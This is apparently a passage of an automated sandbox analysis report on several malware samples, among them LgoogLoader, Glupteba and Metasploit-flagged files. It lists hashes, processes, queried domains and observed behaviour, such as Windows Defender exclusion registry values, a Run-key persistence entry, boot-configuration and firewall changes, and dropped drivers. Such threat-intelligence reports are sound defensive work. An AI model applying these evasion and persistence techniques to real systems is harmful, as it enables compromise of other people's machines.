| SHA1 | b644571a945e747b74e75a41a41fe9700839629a |
| SHA256 | 0ae95e0118622fe5e48a0138bc68da8ddac6e6e2745e7bfccceca7959c0cf6a5 |
| SHA512 | dcef4ef7ba4c9068989fb7e059ee7fae14afe16081af4ba112b152c423c128e18bf774fa994b4aa74a3bf876f6c89c79b297492ec50b2cefdcd43c50f6ae8180 |
memory/2588-3763-0x0000000002A50000-0x0000000002B0A000-memory.dmp
C:\Config.Msi\f774f8a.rbs
| MD5 | 32244b8e042341d711c096ab9ff8ba12 |
| SHA1 | 8231db36fcb7649ce075a376e6ac2338ddda2aff |
| SHA256 | cb63cbf00951d2d73088450aee32b0895f739b8c3bb9e174c20fc542f9548bc1 |
| SHA512 | cacea2a7d92196d1a1df5a7a5e10a3cf63d2b0a099b46c5c6e623f97419be348da16c356a93a9c407987cbe1a7369cc3bae056e00320ec04351b209157a91d66 |
memory/664-3863-0x000000006EAC0000-0x000000006EC09000-memory.dmp
memory/664-3860-0x0000000073F50000-0x000000007463E000-memory.dmp
memory/664-3868-0x0000000073F50000-0x000000007463E000-memory.dmp
memory/664-3871-0x000000006EAC0000-0x000000006EC09000-memory.dmp
memory/664-3876-0x0000000073F50000-0x000000007463E000-memory.dmp
memory/664-3879-0x000000006EAC0000-0x000000006EC09000-memory.dmp
Analysis: behavioral19
Detonation Overview
Submitted
2024-11-08 09:08
Reported
2024-11-08 09:11
Platform
win7-20240903-en
Max time kernel
122s
Max time network
123s
Command Line
Signatures
Detects LgoogLoader payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
LgoogLoader
Lgoogloader family
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\inst002.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\inst002.exe
"C:\Users\Admin\AppData\Local\Temp\inst002.exe"
Network
Files
memory/2076-1-0x0000000000170000-0x0000000000182000-memory.dmp
memory/2076-0-0x00000000000F0000-0x0000000000100000-memory.dmp
Analysis: behavioral5
Detonation Overview
Submitted
2024-11-08 09:08
Reported
2024-11-08 09:11
Platform
win7-20240903-en
Max time kernel
121s
Max time network
124s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-9T31A.tmp\IDWCH2.tmp | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IDWCH2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-9T31A.tmp\IDWCH2.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-9T31A.tmp\IDWCH2.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-9T31A.tmp\IDWCH2.tmp | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\IDWCH2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-9T31A.tmp\IDWCH2.tmp | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\IDWCH2.exe
"C:\Users\Admin\AppData\Local\Temp\IDWCH2.exe"
C:\Users\Admin\AppData\Local\Temp\is-9T31A.tmp\IDWCH2.tmp
"C:\Users\Admin\AppData\Local\Temp\is-9T31A.tmp\IDWCH2.tmp" /SL5="$40016,506127,422400,C:\Users\Admin\AppData\Local\Temp\IDWCH2.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | the-flash-man.com | udp |
| US | 8.8.8.8:53 | best-link-app.com | udp |
Files
memory/1996-3-0x0000000000401000-0x000000000040B000-memory.dmp
memory/1996-0-0x0000000000400000-0x000000000046D000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-9T31A.tmp\IDWCH2.tmp
| MD5 | 6020849fbca45bc0c69d4d4a0f4b62e7 |
| SHA1 | 5be83881ec871c4b90b4bf6bb75ab8d50dbfefe9 |
| SHA256 | c6c796f0d37e1a80632a295122db834499017b8d07728e0b5dfa6325ed3cab98 |
| SHA512 | f4c359a9ebf362b943d10772efe9cfd0a0153c1ff866ffdf1223e16e544dfa2250f67e7a7682d2558761d36efe15c7de1a2c311bc67b162eb77394ef179924eb |
memory/1572-8-0x0000000000400000-0x0000000000516000-memory.dmp
\Users\Admin\AppData\Local\Temp\is-ERDQJ.tmp\_isetup\_shfoldr.dll
| MD5 | 92dc6ef532fbb4a5c3201469a5b5eb63 |
| SHA1 | 3e89ff837147c16b4e41c30d6c796374e0b8e62c |
| SHA256 | 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87 |
| SHA512 | 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3 |
\Users\Admin\AppData\Local\Temp\is-ERDQJ.tmp\idp.dll
| MD5 | 8f995688085bced38ba7795f60a5e1d3 |
| SHA1 | 5b1ad67a149c05c50d6e388527af5c8a0af4343a |
| SHA256 | 203d7b61eac96de865ab3b586160e72c78d93ab5532b13d50ef27174126fd006 |
| SHA512 | 043d41947ab69fc9297dcb5ad238acc2c35250d1172869945ed1a56894c10f93855f0210cbca41ceee9efb55fd56a35a4ec03c77e252409edc64bfb5fb821c35 |
memory/1572-22-0x0000000000400000-0x0000000000516000-memory.dmp
memory/1996-24-0x0000000000400000-0x000000000046D000-memory.dmp
Analysis: behavioral12
Detonation Overview
Submitted
2024-11-08 09:08
Reported
2024-11-08 09:11
Platform
win10v2004-20241007-en
Max time kernel
150s
Max time network
147s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\anyname.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\anyname.exe
"C:\Users\Admin\AppData\Local\Temp\anyname.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | a.goatgame.co | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | a.goatgame.co | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | a.goatgame.co | udp |
| US | 8.8.8.8:53 | a.goatgame.co | udp |
| US | 8.8.8.8:53 | a.goatgame.co | udp |
| US | 8.8.8.8:53 | a.goatgame.co | udp |
| US | 8.8.8.8:53 | 197.87.175.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | a.goatgame.co | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.117.19.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | a.goatgame.co | udp |
| US | 8.8.8.8:53 | a.goatgame.co | udp |
| US | 8.8.8.8:53 | a.goatgame.co | udp |
| US | 8.8.8.8:53 | a.goatgame.co | udp |
| US | 8.8.8.8:53 | a.goatgame.co | udp |
| US | 8.8.8.8:53 | a.goatgame.co | udp |
| US | 8.8.8.8:53 | a.goatgame.co | udp |
| US | 8.8.8.8:53 | a.goatgame.co | udp |
| US | 8.8.8.8:53 | a.goatgame.co | udp |
| US | 8.8.8.8:53 | a.goatgame.co | udp |
| US | 8.8.8.8:53 | a.goatgame.co | udp |
| US | 8.8.8.8:53 | a.goatgame.co | udp |
| US | 8.8.8.8:53 | a.goatgame.co | udp |
| US | 8.8.8.8:53 | a.goatgame.co | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | a.goatgame.co | udp |
| US | 8.8.8.8:53 | a.goatgame.co | udp |
| US | 8.8.8.8:53 | a.goatgame.co | udp |
| US | 8.8.8.8:53 | a.goatgame.co | udp |
| US | 8.8.8.8:53 | a.goatgame.co | udp |
| US | 8.8.8.8:53 | a.goatgame.co | udp |
| US | 8.8.8.8:53 | a.goatgame.co | udp |
| US | 8.8.8.8:53 | a.goatgame.co | udp |
| US | 8.8.8.8:53 | a.goatgame.co | udp |
Files
Analysis: behavioral13
Detonation Overview
Submitted
2024-11-08 09:08
Reported
2024-11-08 09:11
Platform
win7-20240903-en
Max time kernel
150s
Max time network
139s
Command Line
Signatures
Glupteba
Glupteba family
Glupteba payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
MetaSploit
Metasploit family
Windows security bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows = "0" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\SummerMorning = "0" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\app.exe = "0" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\wup = "0" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\drivers\Winmon.sys | C:\Windows\rss\csrss.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Possible attempt to disable PatchGuard
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\rss\csrss.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| N/A | N/A | C:\Windows\rss\csrss.exe | N/A |
| N/A | N/A | C:\Windows\rss\csrss.exe | N/A |
Windows security modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows = "0" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\app.exe = "0" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\SummerMorning = "0" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\wup = "0" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\SummerMorning = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
Checks installed software on the system
Manipulates WinMon driver.
| Description | Indicator | Process | Target |
| File opened for modification | \??\WinMon | C:\Windows\rss\csrss.exe | N/A |
Manipulates WinMonFS driver.
| Description | Indicator | Process | Target |
| File opened for modification | \??\WinMonFS | C:\Windows\rss\csrss.exe | N/A |
Checks for VirtualBox DLLs, possible anti-VM trick
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\VBoxMiniRdrDN | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\rss | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| File created | C:\Windows\rss\csrss.exe | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| File created | C:\Windows\Logs\CBS\CbsPersist_20241108090848.cab | C:\Windows\system32\makecab.exe | N/A |
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\rss\csrss.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
GoLang User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-352 = "FLE Standard Time" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-102 = "Microsoft Corporation" | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-572 = "China Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-212 = "Pacific Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-621 = "Korea Daylight Time" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-772 = "Montevideo Standard Time" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-742 = "New Zealand Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-981 = "Kamchatka Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-1022 = "Bangladesh Standard Time" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-502 = "Nepal Standard Time" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-492 = "India Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-335 = "Jordan Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-692 = "Tasmania Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-132 = "US Eastern Standard Time" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-361 = "GTB Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-431 = "Iran Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-961 = "Paraguay Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-191 = "Mountain Daylight Time" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-152 = "Central America Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-371 = "Jerusalem Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-262 = "GMT Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-52 = "Greenland Standard Time" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-211 = "Pacific Daylight Time" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-602 = "Taipei Standard Time" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-334 = "Jordan Daylight Time" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-552 = "North Asia Standard Time" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-741 = "New Zealand Daylight Time" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-351 = "FLE Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-592 = "Malay Peninsula Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-449 = "Azerbaijan Standard Time" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-21 = "Cape Verde Daylight Time" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-371 = "Jerusalem Daylight Time" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-201 = "US Mountain Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\rss\csrss.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-100 = "EAP Quarantine Enforcement Client" | C:\Windows\system32\netsh.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace\Session | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-202 = "US Mountain Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-100 = "RD Gateway Quarantine Enforcement Client" | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-582 = "North Asia East Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-241 = "Samoa Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\rss\csrss.exe | N/A |
